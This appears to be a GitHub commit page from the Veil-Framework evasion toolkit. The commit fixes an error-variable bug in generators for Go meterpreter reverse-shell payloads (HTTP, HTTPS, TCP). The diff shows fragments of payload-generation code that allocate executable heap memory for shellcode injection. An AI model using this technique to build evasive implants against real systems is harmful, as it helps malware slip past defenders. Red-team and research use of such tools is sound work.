Fixed bug in golang payloads with heap injection

Veil-Framework · May 17, 2018 · 1d81a37 · 1d81a37
1 parent 1be812e
commit 1d81a37
Show file tree

Hide file tree

Showing 5 changed files with 11 additions and 7 deletions.
diff --git a/CHANGELOG b/CHANGELOG
@@ -1,3 +1,7 @@
+[2018-05-17]
+     Released.: 3.1.11
+     Modified.: Golang/meterpreter/* payloads have big fixed when injection via heap. Thanks to Carlos for pointing this out
+
 [2018-05-16]
      Released.: 3.1.10
      Modified.: Setup script now in compatible with void thanks to PR #212

diff --git a/lib/common/messages.py b/lib/common/messages.py
@@ -15,7 +15,7 @@
     sys.exit()
 
 # Current version of Veil
-veil_version = "3.1.10"
+veil_version = "3.1.11"
 
 
 def title_screen():

diff --git a/tools/evasion/payloads/go/meterpreter/rev_http.py b/tools/evasion/payloads/go/meterpreter/rev_http.py
@@ -135,9 +135,9 @@ def generate(self):
             payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
             payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
             payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (cust_func, size)
-            payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
+            payload_code += heapcreateout + ", _, " + errorvariabledos + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
             payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
-            payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, err, allocvarout)
+            payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, errorvariabledos, allocvarout)
 
         payload_code += "func %s(%s int, %s []byte) string {\n" % (randBase, length, foo)
         payload_code += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" % (random)

diff --git a/tools/evasion/payloads/go/meterpreter/rev_https.py b/tools/evasion/payloads/go/meterpreter/rev_https.py
@@ -146,9 +146,9 @@ def generate(self):
             payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
             payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
             payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (cust_func, size)
-            payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
+            payload_code += heapcreateout + ", _, " + errorvariabledos + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
             payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
-            payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, err, allocvarout)
+            payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, errorvariabledos, allocvarout)
 
         payload_code += "func %s(%s int, %s []byte) string {\n" % (randBase, length, foo)
         payload_code += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" % (random)

diff --git a/tools/evasion/payloads/go/meterpreter/rev_tcp.py b/tools/evasion/payloads/go/meterpreter/rev_tcp.py
@@ -134,9 +134,9 @@ def generate(self):
             payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n"
             payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n"
             payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % (cust_func, size)
-            payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
+            payload_code += heapcreateout + ", _, " + errorvariabledos + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n"
             payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n"
-            payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, err, allocvarout)
+            payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % (allocvarout, errorvariabledos, allocvarout)
 
         payload_code += "func main() {\n"
         # Sandbox code goes here